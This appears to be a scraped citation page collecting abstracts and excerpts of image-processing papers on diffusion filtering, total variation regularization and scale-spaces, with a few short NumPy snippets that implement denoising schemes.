Preprint Full-text available

Partial differential equation (PDE) models and their associated variational energy formulations are often rotationally invariant by design.
This ensures that a rotation of the input results in a corresponding rotation of the output, which is desirable in applications such as image analysis. Convolutional neural networks (CNNs) do not share this property, and existing remedies are often complex. The goal of our paper is to investigate how diffusion and variational models achieve rotation invariance and transfer these ideas to neural networks. As a core novelty, we propose activation functions which couple network channels by combining information from several oriented filters. This guarantees rotation invariance within the basic building blocks of the networks while still allowing for directional filtering. The resulting neural architectures are inherently rotationally invariant. With only a few small filters, they can achieve the same invariance as existing techniques which require a fine-grained sampling of orientations. Our findings help to translate diffusion and variational models into mathematically well-founded network architectures, and provide novel concepts for model-based CNN design.

... On the other hand, anisotropic diffusion is inherent to Perona-Malik (PM) filtering [36]. It is well known that the diffusion process governed by the PM equation leads to a decrease in the total variation during its evolution [43]. We thus choose the energy functional of the Perona-Malik equation for anisotropic diffusion [36]. ...

... We refer to [11,43] for a general introduction to anisotropic diffusion and a detailed discussion on the PM functional. Further, in [40], the PM model was used in the reconstruction of log-conductivities in AET and it was observed that the reconstructions obtained demonstrated superior contrast and resolution. ...

Article Full-text available

A new nonlinear optimization approach is proposed for the sparse reconstruction of log-conductivities in current density impedance imaging.
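Several of the excerpts above rely on the Perona-Malik (PM) filter and on the cited fact that its evolution decreases the total variation. A minimal 1D explicit scheme makes both properties easy to check; this is an illustrative sketch, not code from any of the cited works, with the classical PM diffusivity g(s) = 1/(1 + s/λ²) and arbitrary choices of the contrast parameter λ and step size τ.

```python
import numpy as np

def perona_malik_step(u, lam=0.1, tau=0.2):
    """One explicit step of 1D Perona-Malik diffusion
    u_t = (g(u_x^2) u_x)_x with g(s) = 1/(1 + s/lam^2).
    Since g <= 1, tau <= 0.25 keeps the explicit scheme stable."""
    ux = np.diff(u)                      # forward differences on cell edges
    g = 1.0 / (1.0 + (ux / lam) ** 2)    # PM diffusivity: small across strong edges
    flux = g * ux
    # divergence with zero flux across both boundaries (reflecting BC)
    return u + tau * np.diff(np.concatenate(([0.0], flux, [0.0])))

# A noisy step edge: PM should denoise the flat parts but keep the jump.
clean = np.concatenate((np.zeros(32), np.ones(32)))
u_noisy = clean + 0.05 * np.random.default_rng(1).standard_normal(64)
v = u_noisy.copy()
for _ in range(50):
    v = perona_malik_step(v)
```

With these parameters the scheme is monotone, so the discrete total variation does not increase, and the zero-flux boundaries preserve the mean grey value exactly.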
This framework comprises minimizing an objective functional involving a least-squares fit of the interior electric field data corresponding to two boundary voltage measurements, where the conductivity and the electric potential are related through an elliptic PDE arising in electrical impedance tomography. Further, the objective functional consists of an $L^1$ regularization term that promotes sparsity patterns in the conductivity and a Perona–Malik anisotropic diffusion term that enhances the edges to facilitate high contrast and resolution. This framework is motivated by a similar recent approach to solve an inverse problem in acousto-electric tomography. Several numerical experiments and comparison with an existing method demonstrate the effectiveness of the proposed method for superior image reconstructions of a wide variety of log-conductivity patterns.

... and results in the diffusion equation [25,42,51]. In the case of isotropic filtering, the diffusion equation has a closed-form solution. ...

... This problem has previously been studied by, e.g., Scherzer and Weickert [51]. Here we tackle the energy functional directly and show that the failing component is the application of Green's identity. ...

Article Full-text available

In this work, we introduce a novel tensor-based functional for targeted image enhancement and denoising. Via explicit regularization, our formulation incorporates application-dependent and contextual information using first principles. Few works in the literature treat variational models that describe both application-dependent information and contextual knowledge of the denoising problem. We prove the existence of a minimizer and present results on tensor symmetry constraints, convexity, and geometric interpretation of the proposed functional. We show that our framework excels in applications where nonlinear functions are present, such as in gamma correction and targeted value range filtering.
We also study general denoising performance, where we show comparable results to dedicated PDE-based state-of-the-art methods.

... More recent approaches attempt to fuse the two formulations [Bruhn 2005]. The penalty term plays a key role, as a diffusion operator can act isotropically or anisotropically [Black 1998, Scherzer 2000, Aubert 2006]. A variety of diffusion mechanisms has been proposed so that, e.g., optical flow discontinuities could be preserved depending on velocity field variations or image structures. ...

Thesis

In this thesis, we studied the problem of motion estimation in mammals and propose that scaling up models rooted in biology for real-world applications can give us fresh insights into biological vision. Using a classic model that describes the activity of directionally selective neurons in the V1 and MT areas of the macaque brain, we proposed a feedforward V1-MT architecture for motion estimation and benchmarked it on computer vision datasets (the first publicly available evaluation for this kind of model), revealing interesting shortcomings such as lack of selectivity at motion boundaries and lack of spatial association of the flow field. To address these, we proposed two extensions: a form-modulated pooling strategy to minimize errors at texture boundaries and a regression-based decoding scheme. These extensions improved estimation accuracy but also reemphasized the debate about the role of different cell types (characterized by their tuning curves) in encoding motion, for example the relative role of pattern cells versus component cells. To understand this, we used a phenomenological neural fields model representative of a population of directionally tuned MT cells to check whether different tuning behaviors could be reproduced by a recurrently interacting population or if we need different types of cells explicitly.
Our results indicated that a variety of tuning behavior can be reproduced by a minimal network, explaining dynamical changes in the tuning with change of stimuli and leading us to question the high-inhibition regimes typically considered by models in the literature.

... In order to overcome the problems of ADF and TV and combine their benefits, it is helpful to notice the close relation between diffusion filtering and regularization, which was initially studied in [57] for isotropic diffusion. The relation between anisotropic diffusion and TV regularization was studied in [25], via the TRTV model as follows, ...

Article Full-text available

Third harmonic generation (THG) microscopy shows great potential for instant pathology of brain tissue during surgery. However, the rich morphologies contained and the associated noise make image restoration, necessary for quantification of the THG images, challenging. Anisotropic diffusion filtering (ADF) has recently been applied to restore THG images of normal brain, but ADF is hard to code, time-consuming and only reconstructs salient edges. This work overcomes these drawbacks by expressing ADF as a tensor-regularized total variation (TRTV) model, which uses the Huber penalty and the L1 norm for tensor regularization and fidelity measurement, respectively. The diffusion tensor is constructed from the structure tensor of ADF, yet the tensor decomposition is performed only in the non-flat areas. The resulting model is solved by an efficient and easy-to-code primal-dual algorithm. Tests on THG brain tumor images show that the proposed model has comparable denoising performance to ADF while it much better restores weak edges and is up to 60% more time efficient.

... For the Rudin, Osher, Fatemi (ROF) regularization [52], also known as total variation regularization, the data term is the squared $L^2$-norm and $R(w) = |w|_{TV}$ is the total variation semi-norm.
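The ROF regularization just quoted minimizes a squared $L^2$ data term plus a multiple of the TV semi-norm. A common way to handle the non-differentiability of TV is to smooth it with a small ε; the gradient-descent sketch below uses that standard trick. It is illustrative only: the 1D setting and the parameters λ, ε, τ are arbitrary choices, not taken from the cited works.

```python
import numpy as np

def rof_denoise(f, lam=0.5, eps=0.1, tau=0.05, steps=300):
    """Gradient descent on a smoothed ROF functional
    E(u) = 0.5 * sum((u - f)^2) + lam * sum(sqrt(u_x^2 + eps^2)),
    where the eps-term regularizes the non-differentiable TV semi-norm."""
    u = f.copy()
    for _ in range(steps):
        ux = np.diff(u)
        w = ux / np.sqrt(ux ** 2 + eps ** 2)   # derivative of the smoothed TV term
        div = np.diff(np.concatenate(([0.0], w, [0.0])))  # zero-flux boundaries
        u = u - tau * ((u - f) - lam * div)
    return u

def rof_energy(u, f, lam=0.5, eps=0.1):
    """The smoothed ROF energy being minimized above."""
    return 0.5 * np.sum((u - f) ** 2) + lam * np.sum(np.sqrt(np.diff(u) ** 2 + eps ** 2))

rng = np.random.default_rng(0)
f = np.concatenate((np.zeros(32), np.ones(32))) + 0.1 * rng.standard_normal(64)
u = rof_denoise(f)
```

Starting the descent at u = f guarantees that the energy only decreases, and the zero-flux divergence term leaves the mean grey value unchanged, two of the properties the excerpts above attribute to regularization scale-spaces.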
Other widely used regularization functionals are sparsity-promoting functionals [22,39], Besov space norms [44,40] and anisotropic regularization norms [45,54]. Aside from various regularization terms, different fidelity terms have also been proposed other than quadratic norm fidelities, like the $p$-th powers of $\ell^p$- and $L^p$-norms of the differences of F(w) and v [53,55], maximum entropy [25,26] and Kullback-Leibler divergence [50] (see [48] for some reference work). ...

Preprint

We present an approach for variational regularization of inverse and imaging problems for recovering functions with values in a set of vectors. We introduce regularization functionals, which are derivative-free double integrals of such functions. These regularization functionals are motivated from double integrals, which approximate Sobolev semi-norms of intensity functions. These were introduced in Bourgain, Brézis and Mironescu, "Another Look at Sobolev Spaces". In: Optimal Control and Partial Differential Equations: Innovations and Applications, IOS Press, Amsterdam, 2001. For the proposed regularization functionals we prove existence of minimizers as well as a stability and convergence result for functions with values in a set of vectors.

... For example, regularisation methods and related concepts can be interpreted as scale-spaces by considering their Euler-Lagrange equations, both in the linear and the nonlinear setting [see e.g. Poggio et al., 1988, Scherzer and Weickert, 2000, Burgeth et al., 2005b, Demetz et al., 2012]. Since Gaussian scale-space can be described by a linear diffusion equation, it is natural to generalise it also to nonlinear diffusion scale-spaces [Perona and Malik, 1990, Weickert, 1998]. ...

... For simplicity, we call this process diffusion in both cases, as usual in physics. For details of the very close relation between regularization and diffusion see (Scherzer and Weickert, 1998). ...
Article Full-text available

In this work we propose a novel non-linear diffusion filtering approach for images based on their channel representation. To derive the diffusion update scheme we formulate a novel energy functional using a soft-histogram representation of image pixel neighborhoods obtained from the channel encoding. The resulting Euler-Lagrange equation yields a non-linear robust diffusion scheme with additional weighting terms stemming from the channel representation which steer the diffusion process. We apply this novel energy formulation to image reconstruction problems, showing good performance in the presence of mixtures of Gaussian and impulse-like noise, e.g. missing data. In denoising experiments on common scalar-valued images our approach performs competitively compared to other diffusion schemes as well as state-of-the-art denoising methods for the considered noise types.

... Interestingly, diffusion filtering can be related to many other types of denoising methods. For instance, Scherzer and Weickert [23] have shown connections between variational methods such as Tikhonov [26] or TV regularisation [22] and fully implicit time discretisations of diffusion filters. Furthermore, a large variety of diffusion filters for denoising can be interpreted as Bayesian denoising models; see e.g. ...

Conference Paper Full-text available

The filling-in effect of diffusion processes has been successfully used in many image analysis applications. Examples include image reconstructions in inpainting-based compression or dense optic flow computations. As an interesting side effect of diffusion-based inpainting, the interpolated data are smooth, even if the known image data are noisy: inpainting averages information from noisy sources. Since this effect has not been investigated for denoising purposes so far, we propose a general framework for denoising by inpainting.
It averages multiple inpainting results from different selections of known data. We evaluate two concrete implementations of this framework: the first one specifies known data on a shifted regular grid, while the second one employs probabilistic densification to optimise the known pixel locations w.r.t. the inpainting quality. For homogeneous diffusion inpainting, we demonstrate that our regular grid method approximates the quality of its corresponding diffusion filter. The densification algorithm with homogeneous diffusion inpainting, however, shows edge-preserving behaviour. It resembles space-variant diffusion and offers better reconstructions than homogeneous diffusion filters.

... Originally, the procedure to determine the minimum-norm solutions for ill-posed systems was given by Tikhonov (1963); for regularisation methods, see the references Charbonnier et al. (1994), Nordstrom (1990), Scherzer (1998), Scherzer and Weickert (2000) and Schnörr (1994). Our exemplar of a variational method for denoising or simplifying an image $u_0$ can be achieved as in Welk et al. (2005) by minimising the energy functional ...

Article

Image denoising is still a crucial problem for the image processing community and mathematicians alike. This paper proposes a denoising technique based on wavelet coefficients via a diffusion equation. The present work compares different denoising processes by diffusion models. The data are initially subjected to synthetic noise with various levels of standard deviation $\sigma^2$. To quantify the results, we use the peak signal-to-noise ratio (PSNR) as a metric.

... Typical representatives of nonlinear scale-spaces are given by nonlinear diffusion scale-spaces [1], the morphological equivalent of Gaussian scale-space [16], and curvature-driven evolutions such as the affine morphological scale-space [17].
Moreover, also spatio-temporal scale-spaces have been considered [18,19], regularisation methods have been identified as scale-spaces [20], and spatially varying dominant scales have been proposed in [21]. Many of these processes exhibit a local behaviour and can be described in terms of partial differential equations (PDEs) or pseudodifferential equations. ...

... Previous works [48], [41] show that in the nonlinear diffusion framework, there exist natural relations between reaction diffusion and regularization-based energy functionals. First of all, we can interpret (4) as one gradient descent step at $u_{t-1}$ of a certain energy functional given by ...

Article

Image restoration is a long-standing problem in low-level computer vision with many interesting applications. We describe a flexible learning framework based on the concept of nonlinear reaction diffusion models for various image restoration problems. By embodying recent improvements in nonlinear diffusion models, we propose a dynamic nonlinear reaction diffusion model with time-dependent parameters (i.e., linear filters and influence functions). In contrast to previous nonlinear diffusion models, all the parameters, including the filters and the influence functions, are simultaneously learned from training data through a loss-based approach. We call this approach TNRD (Trainable Nonlinear Reaction Diffusion). The TNRD approach is applicable to a variety of image restoration tasks by incorporating an appropriate reaction force. We demonstrate its capabilities with three representative applications: Gaussian image denoising, single-image super-resolution and JPEG deblocking. Experiments show that our trained nonlinear diffusion models largely benefit from the training of the parameters and finally lead to the best reported performance on common test datasets for the tested applications.
Our trained models preserve the structural simplicity of diffusion models and take only a small number of diffusion steps, and thus are highly efficient. Moreover, they are also well suited for parallel computation on GPUs, which makes the inference procedure extremely fast.

... where the first term, called the fidelity term, encourages the similarity between the given image and its denoised version f, and the second term P(f, ∇f), called the penalty term, controls the regularity of the solution. Indeed, it is known that there is a strong relation between regularisation methods and diffusion filters [74]. ...

... This is a fundamental idea in image processing related to the concept of scale spaces; see e.g. [4,11] for useful discussions. However, especially in the context of nonlinear filtering, it is not at all obvious when to stop the diffusion process. ...

Conference Paper

Anisotropic diffusion is a time-dependent process in image processing useful for denoising and related tasks. Applied to an input image, the latter is gradually simplified in such a way that edges tend to be preserved. Meaningful image structures can then be detected depending on the diffusion time and the spatial scale of a structure. One of the most important points in anisotropic diffusion filtering is introducing a stopping criterion for the time evolution, as this defines the quality of output images. In this paper, we follow the approach of a recent method by Ilyevsky and Turkel for determining a useful stopping time. While following the same basic idea, we simplify the underlying algorithm and at the same time improve the quality of filtering results significantly. The superiority of our scheme is validated by several numerical experiments with standard test images in the field.
Conference Paper

Describing persons and their actions is a challenging problem due to variations in pose, scale and viewpoint in real-world images. Recently, the semantic pyramids approach [1] for pose normalization has been shown to provide excellent results for gender and action recognition. The performance of the semantic pyramids approach relies on robust image description and is therefore limited due to the use of shallow local features. In the context of object recognition [2] and object detection [3], convolutional neural networks (CNNs) or deep features have been shown to improve the performance over conventional shallow features. We propose deep semantic pyramids for human attribute and action recognition. The method works by constructing spatial pyramids based on CNNs of different part locations. These pyramids are then combined to obtain a single semantic representation. We validate our approach on the Berkeley and 27 Human Attributes datasets for attribute classification. For action recognition, we perform experiments on two challenging datasets: Willow and PASCAL VOC 2010. The proposed deep semantic pyramids provide a significant gain of 17.2%, 13.9%, 24.3% and 22.6% compared to the standard shallow semantic pyramids on the Berkeley, 27 Human Attributes, Willow and PASCAL VOC 2010 datasets respectively. Our results also show that deep semantic pyramids outperform conventional CNNs based on the full bounding box of the person. Finally, we compare our approach with state-of-the-art methods and show a gain in performance compared to the best methods in the literature.

... Then, for a smooth initial function $u^{(0)}$ and $\alpha \to 0$, $(u_\alpha - u^{(0)})/\alpha$ converges to an element of the subgradient $\partial R(u^{(0)})$ of R. Performing an iterative minimization of (…) are comparable and look rather similar [149]. We expect a similar behavior for the non-convex functional ...
TV denoising in particular has several very interesting equivalences. It is well known that TV denoising and other, more general first-order denoising methods are equivalent to smoothing with certain nonlinear diffusion models [26], a typical result of writing the equivalent Euler-Lagrange equations. Perhaps discussed less frequently, and most related to the observations in our current work, TV denoising is equivalent to soft-threshold denoising with the highest-frequency basis elements of the Haar wavelets [27,28], in particular with the so-called cycle spinning [29]. ...

Article Full-text available

In the realm of signal and image denoising and reconstruction, $\ell_1$ regularization techniques have generated a great deal of attention with a multitude of variants. In this work, we demonstrate that the $\ell_1$ formulation can sometimes result in undesirable artifacts that are inconsistent with the desired sparsity-promoting $\ell_0$ properties that the $\ell_1$ formulation is intended to approximate. With this as our motivation, we develop a multiscale higher-order total variation (MHOTV) approach, which we show is related to the use of multiscale Daubechies wavelets. The relationship of higher-order regularization methods with wavelets, which we believe has generally gone unrecognized, is shown to hold in several numerical results, although notable improvements are seen with our approach over both wavelets and classical HOTV. These results are presented for 1D signals and 2D images, and we include several examples that highlight the potential of our approach for improving two- and three-dimensional electron microscopy imaging. In the development of the approach, we construct the tools necessary for MHOTV computations to be performed efficiently, via operator decomposition and alternatively converting the problem into Fourier space.

... Other widely used regularization functionals are sparsity-promoting functionals [22,41], Besov space norms [42,46] and anisotropic regularization norms [47,56].
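The excerpt above relates TV denoising to soft thresholding of the finest-scale Haar wavelet coefficients. A one-level Haar shrinkage sketch makes the mechanism concrete; this is illustrative only (the threshold t is arbitrary and no cycle spinning is performed, so it does not reproduce the equivalence results of the cited works).

```python
import numpy as np

def soft_threshold(x, t):
    """Soft shrinkage, the proximal operator of the l1 norm."""
    return np.sign(x) * np.maximum(np.abs(x) - t, 0.0)

def haar_shrink(u, t):
    """One-level Haar wavelet soft-threshold denoising of a 1D signal of
    even length: shrink only the detail (highest-frequency) coefficients
    and keep the approximation coefficients untouched."""
    a = (u[0::2] + u[1::2]) / np.sqrt(2)   # approximation coefficients
    d = (u[0::2] - u[1::2]) / np.sqrt(2)   # detail coefficients
    d = soft_threshold(d, t)
    out = np.empty_like(u)                 # inverse Haar transform
    out[0::2] = (a + d) / np.sqrt(2)
    out[1::2] = (a - d) / np.sqrt(2)
    return out
```

With threshold zero the transform pair is an exact reconstruction; a positive threshold damps small pairwise differences, which is the local smoothing behaviour that underlies the connection to first-order TV denoising.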
Aside from various regularization terms, different fidelity terms have also been proposed other than quadratic norm fidelities, like the $p$-th powers of $\ell^p$- and $L^p$-norms of the differences of F(w) and v [55,57], maximum entropy [26,28] and Kullback-Leibler divergence [52] (see [50] for some reference work). ...

Article Full-text available

We present an approach for variational regularization of inverse and imaging problems for recovering functions with values in a set of vectors. We introduce regularization functionals, which are derivative-free double integrals of such functions. These regularization functionals are motivated from double integrals, which approximate Sobolev semi-norms of intensity functions. These were introduced in Bourgain et al. (Another look at Sobolev spaces. In: Menaldi, Rofman, Sulem (eds) Optimal control and partial differential equations: innovations and applications: in honor of Professor Alain Bensoussan's 60th anniversary, IOS Press, Amsterdam, pp 439–455, 2001). For the proposed regularization functionals, we prove existence of minimizers as well as a stability and convergence result for functions with values in a set of vectors.

... where the penaliser Ψ can be linked to the diffusivity with g = Ψ′ [97]. The penaliser must be increasing, but not necessarily convex. ...

Article Full-text available

We investigate numerous structural connections between numerical algorithms for partial differential equations (PDEs) and neural architectures. Our goal is to transfer the rich set of mathematical foundations from the world of PDEs to neural networks. Besides structural insights, we provide concrete examples and experimental evaluations of the resulting architectures. Using the example of generalised nonlinear diffusion in 1D, we consider explicit schemes, acceleration strategies thereof, implicit schemes, and multigrid approaches. We connect these concepts to residual networks, recurrent neural networks, and U-net architectures.
Our findings inspire a symmetric residual network design with provable stability guarantees and justify the effectiveness of skip connections in neural networks from a numerical perspective. Moreover, we present U-net architectures that implement multigrid techniques for learning efficient solutions of partial differential equation models, and motivate uncommon design choices such as trainable nonmonotone activation functions. Experimental evaluations show that the proposed architectures save half of the trainable parameters and can thus outperform standard ones with the same model complexity. Our considerations serve as a basis for explaining the success of popular neural architectures and provide a blueprint for developing new mathematically well-founded neural building blocks.

... Since its introduction by Perona and Malik, an extensive literature has appeared presenting a number of PDE-based anisotropic models which offer diverse modifications in order to attain a steady-state solution and to address the issue of staircase effects [23][24][25][26][27][28][29][30]. The staircase effect presents a visually unpleasant artefactual display in images and is often mistaken for a false edge. ...

Article At the crossing of statistical and functional analysis, there exists a relentless quest for an efficient image denoising algorithm. In terms of greyscale imaging, a plethora of denoising algorithms have been documented in the literature, in spite of which these algorithms still leave margin for improvement before reaching the desired level of applicability. Quite often the noise affecting the pixels in an image is Gaussian in nature and uniformly degrades the information-carrying pixels. All methods work optimally under their specific sets of assumptions; however, they tend to create artefacts and remove fine structural details under general conditions. This article focuses on classifying and comparing some of the significant works in the field of denoising. ...
Integrodifferential models for nonlinear diffusion predominantly involve models with Gaussian-smoothed derivatives. Most of these models [14,7,15,16] have been proposed as regularisations of the Perona-Malik filter [1]. For enhancing coherent structures, one also considers a smoothed structure tensor [17] that captures directional information to steer the diffusion process accordingly [2]. ...

Preprint Full-text available We introduce an integrodifferential extension of the edge-enhancing anisotropic diffusion model for image denoising. By accumulating weighted structural information on multiple scales, our model is the first to create anisotropy through multiscale integration. It follows the philosophy of combining the advantages of model-based and data-driven approaches within compact, insightful, and mathematically well-founded models with improved performance. We explore trained results of scale-adaptive weighting and contrast parameters to obtain an explicit modelling by smooth functions. This leads to a transparent model with only three parameters, without significantly decreasing its denoising performance. Experiments demonstrate that it outperforms its diffusion-based predecessors. We show that both multiscale information and anisotropy are crucial for its success.

... Assuming that the approximate solutions u^n_{i,j}, for 1 ≤ i, j ≤ M−1, have been computed, we can approximate the boundary condition by u^n_{0,j} = u^n_{1,j}, u^n_{M,j} = u^n_{M−1,j}, u^n_{i,0} = u^n_{i,1}, u^n_{i,M} = u^n_{i,M−1}, and u^n_{0,0} = u^n_{1,1}, u^n_{0,M} = u^n_{1,M−1}, u^n_{M,0} = u^n_{M−1,1}, u^n_{M,M} = u^n_{M−1,M−1}. As is known, the linear diffusion (ID) is well-posed (Yahya et al. 2014) [which means that the ID model is stable (Weickert 1998)], and the TV model is stable (Scherzer and Weickert 2000). So the new model, which is the combination of these two models, is stable too. ...

Article One of the fundamental problems in the field of image processing is denoising.
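The reflecting boundary conditions quoted above translate directly into code. A minimal NumPy sketch (our own illustration; the function name is hypothetical) copies the first interior values outwards, so that edge and corner identities such as u^n_{0,0} = u^n_{1,1} hold:

```python
import numpy as np

def reflect_boundaries(u):
    # Impose discrete no-flux (reflecting) boundary conditions on a 2D grid:
    # boundary rows and columns mirror their first interior neighbours.
    u = u.copy()
    u[0, :] = u[1, :]      # top row
    u[-1, :] = u[-2, :]    # bottom row
    u[:, 0] = u[:, 1]      # left column
    u[:, -1] = u[:, -2]    # right column
    # Because the column step runs after the row step, the corners
    # automatically satisfy u[0, 0] = u[1, 1], u[0, -1] = u[1, -2], etc.
    return u
```

Applying this after every explicit time step keeps the scheme consistent with homogeneous Neumann boundary conditions.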
The underlying goal of image denoising is to effectively suppress noise while keeping intact the significant features of the image, such as texture and edge information. The gradient of the image is a popular feature descriptor in denoising models for distinguishing edges from ramps. If the received signal of an image is very noisy, the gradient cannot effectively distinguish between image edges and image ramps. In this paper, based on the difference curvature and the gradient of the image, we introduce a new feature descriptor. To demonstrate the effectiveness of the new feature descriptor, we use it in constructing a new diffusion-based denoising model. Experimental results show the effectiveness of the method.

... Also, there have been many methods that use diffusion which can remove speckle noise efficiently. Filtering with the use of a single step of time discretization in diffusion is regarded as regularization [26]. There has been work on the combination of both wavelet and diffusion methods. ...

Article Full-text available Ultrasound (US) images are useful in medical diagnosis. US is preferred over other medical diagnosis techniques because it is non-invasive in nature and has low cost. The presence of speckle noise in US images degrades their usefulness. A method that reduces the speckle noise in US images can help in correct diagnosis. Such a method should also preserve the important structural information in US images while removing the speckle noise. In this paper, a method for removing speckle noise using a combination of wavelet, total variation (TV) and morphological operations has been proposed. The proposed method achieves denoising by combining the advantages of the wavelet, TV and morphological operations along with the utilization of an adaptive regularization parameter which controls the amount of smoothing during denoising.
The work in this paper is capable of reducing speckle noise while preserving the structural information in the denoised image. The proposed method demonstrates strong denoising for synthetic and real ultrasound images, which is also supported by the results of various quantitative measures and by visual inspection.

... An extension by a suitable regularization can help to preserve edges in the reconstruction without the loss of small details or the introduction of additional noise. One possibility is to use diffusion filtering [65], for example variants of the Perona-Malik diffusion [66], in this role. Diffusion filtering was also successfully applied as a post-processing step for CT [67]. ...

Article Full-text available The reconstruction of computed tomography (CT) images is an active area of research. Following the rise of deep learning methods, many data-driven models have been proposed in recent years. In this work, we present the results of a data challenge that we organized, bringing together algorithm experts from different institutes to jointly work on quantitative evaluation of several data-driven methods on two large, public datasets during a ten-day sprint. We focus on two applications of CT, namely, low-dose CT and sparse-angle CT. This enables us to fairly compare different methods using standardized settings. As a general result, we observe that the deep learning-based methods are able to improve the reconstruction quality metrics in both CT applications, while the top-performing methods show only minor differences in terms of peak signal-to-noise ratio (PSNR) and structural similarity (SSIM). We further discuss a number of other important criteria that should be taken into account when selecting a method, such as the availability of training data, the knowledge of the physical measurement model and the reconstruction speed. ...
Sparsification scale-spaces have demonstrated that there are viable scale-space concepts beyond the classical ideas that rely on partial differential equations (PDEs) [2,8,15,21] or evolutions according to pseudodifferential operators [5,17]. In the present paper, we show that quantisation methods can also imply scale-spaces and that this leads to practical consequences for inpainting-based compression. ...

Preprint Full-text available Recently, sparsification scale-spaces have been obtained as a sequence of inpainted images by gradually removing known image data. Thus, these scale-spaces rely on spatial sparsity. In the present paper, we show that sparsification of the co-domain, the set of admissible grey values, also constitutes scale-spaces with induced hierarchical quantisation techniques. These quantisation scale-spaces are closely tied to information-theoretical measures for coding cost, and therefore particularly interesting for inpainting-based compression. Based on this observation, we propose a sparsification algorithm for the grey-value domain that outperforms uniform quantisation as well as classical clustering approaches.

Conference Paper Tensor-driven anisotropic diffusion and regularisation have been successfully applied to a wide range of image processing and computer vision tasks such as denoising, inpainting, and optical flow. Empirically it has been shown that anisotropic models with a diffusion tensor perform better than their isotropic counterparts with a scalar-valued diffusivity function. However, the reason for this superior performance is not well understood so far. Moreover, the specific modelling of the anisotropy has been carried out in a purely heuristic way. The goal of our paper is to address these problems. To this end, we use the statistics of natural images to derive a unifying framework for eight isotropic and anisotropic diffusion filters that have a corresponding variational formulation.
In contrast to previous statistical models, we systematically investigate structure-adaptive statistics by analysing the eigenvalues of the structure tensor. With our findings, we justify existing successful models and assess the relationship between accurate statistical modelling and performance in the context of image denoising.

Conference Paper We investigate the use of fractional powers of the Laplacian for signal and image simplification. We focus both on their corresponding variational techniques and parabolic pseudodifferential equations. We perform a detailed study of the regularisation properties of energy functionals, where the smoothness term consists of various linear combinations of fractional derivatives. The associated parabolic pseudodifferential equations with constant coefficients provide the link to linear scale-space theory. These encompass the well-known α-scale-spaces, even those with parameter values α > 1 known to violate common maximum-minimum principles. Nevertheless, we show that it is possible to construct positivity-preserving combinations of high- and low-order filters. Numerical experiments in this direction indicate that non-integral orders play an essential role in this construction. The paper reveals the close relation between continuous and semi-discrete filters, and thereby helps to facilitate efficient implementations. In additional numerical experiments we compare the variance decay rates for white noise and edge signals through the action of different filter classes.

Conference Paper Line drawings are especially effective and natural in shape depiction. There are generally two ways to generate line drawings: object space methods and image space methods. Compared with object space methods, image space methods are much faster and independent of the 3D object, but easily affected by small noise in the rendered image.
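The α-scale-spaces discussed above are convenient to prototype in the Fourier domain, since (−Δ)^α acts as the multiplier |ξ|^(2α). The sketch below is our own NumPy illustration, not code from the paper: it evolves u_t = −(−Δ)^α u up to time t, so α = 1 recovers Gaussian smoothing and α = 1/2 the Poisson scale-space.

```python
import numpy as np

def alpha_scale_space(signal, t, alpha):
    # Apply the Fourier multiplier exp(-t * |xi|^(2*alpha)) to a 1D signal,
    # i.e. evolve u_t = -(-Laplacian)^alpha u up to time t.
    u = np.asarray(signal, dtype=float)
    xi = 2.0 * np.pi * np.fft.fftfreq(u.size)
    attenuation = np.exp(-t * np.abs(xi) ** (2.0 * alpha))
    return np.real(np.fft.ifft(np.fft.fft(u) * attenuation))
```

The zero frequency is left untouched, so the average grey value is preserved for every α and t, in line with the scale-space requirements mentioned above.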
We suggest applying an edge-preserving L0 gradient smoothing step on the rendered image before line extraction. Experimental results show that our method can effectively alleviate unnecessary small-scale lines, leading to results comparable to object space methods.

Article Full-text available Studies in biological vision have always been a great source of inspiration for the design of computer vision algorithms. In the past, several successful methods were designed with varying degrees of correspondence with biological vision studies, ranging from purely functional inspiration to methods that utilise models that were primarily developed for explaining biological observations. Even though it seems well recognised that computational models of biological vision can help in the design of computer vision algorithms, it is a non-trivial exercise for a computer vision researcher to mine relevant information from the biological vision literature, as very few studies in biology are organised at a task level. In this paper we aim to bridge this gap by providing a computer vision task-centric presentation of models primarily originating in biological vision studies. Not only do we revisit some of the main features of biological vision and discuss the foundations of existing computational studies modelling biological vision, but we also consider three classical computer vision tasks from a biological perspective: image sensing, segmentation and optical flow. Using this task-centric approach, we discuss well-known biological functional principles and compare them with approaches taken by computer vision. Based on this comparative analysis of computer and biological vision, we present some recent models in biological vision and highlight a few models that we think are promising for future investigations in computer vision.
To this end, this paper provides new insights and a starting point for investigators interested in the design of biology-based computer vision algorithms, and paves the way for the much-needed interaction between the two communities leading to the development of synergistic models of artificial and biological vision.

Conference Paper Full-text available The general solution of the anisotropic diffusion model in image denoising has a slow convergence rate. To overcome the problem, a new Newton method is proposed. In the new model, first and second Gateaux derivatives are worked out first. Then two continuous operators are introduced to avoid the error which arises from directly discretizing the iteration equation. To solve the singularity problem of the image and eliminate the impact of the parameter, image geometry features are considered when computing the equation using the lagged fixed point algorithm. The classical Rudin-Osher-Fatemi (ROF) model is taken as an example. In the numerical experiment, the denoising performance of the new Newton method is compared with the gradient descent algorithm and the Newton method proposed by Vogel. The numerical results demonstrate that the new algorithm has a faster computing rate with denoising performance similar to traditional algorithms.

Article Full-text available In this paper, a denoising PDE model based on a combination of the isotropic diffusion and total variation models is presented. The new weighted model is able to be adaptive in each region in accordance with the image's information. The model performs more diffusion in the flat regions of the image, and less diffusion at the edges of the image. The new model has more ability to restore the image in terms of peak signal-to-noise ratio and visual quality, compared with total variation, isotropic diffusion, and some well-known models. Experimental results show that the model is able to suppress the noise effectively while preserving texture features and edge information well.

Conference Paper Most scale-space evolutions are described in terms of partial differential equations. In recent years, however, nonlocal processes have become an important research topic in image analysis. The goal of our paper is to establish well-posedness and scale-space properties for a class of nonlocal evolutions. They are given by linear integro-differential equations with measures. In analogy to Weickert's diffusion theory (1998), we prove existence and uniqueness, preservation of the average grey value, a maximum-minimum principle, image simplification properties in terms of Lyapunov functionals, and we establish convergence to a constant steady state. We show that our nonlocal scale-space theory covers nonlocal variants of linear diffusion. Moreover, by choosing specific discrete measures, the classical semidiscrete diffusion framework is identified as a special case of our continuous theory. Last but not least, we introduce two modifications of bilateral filtering.
In contrast to previous bilateral filters, our variants create nonlocal scale-spaces that preserve the average grey value and that can be highly robust under noise. While these filters are linear, they can achieve a similar performance as nonlinear and even anisotropic diffusion equations.

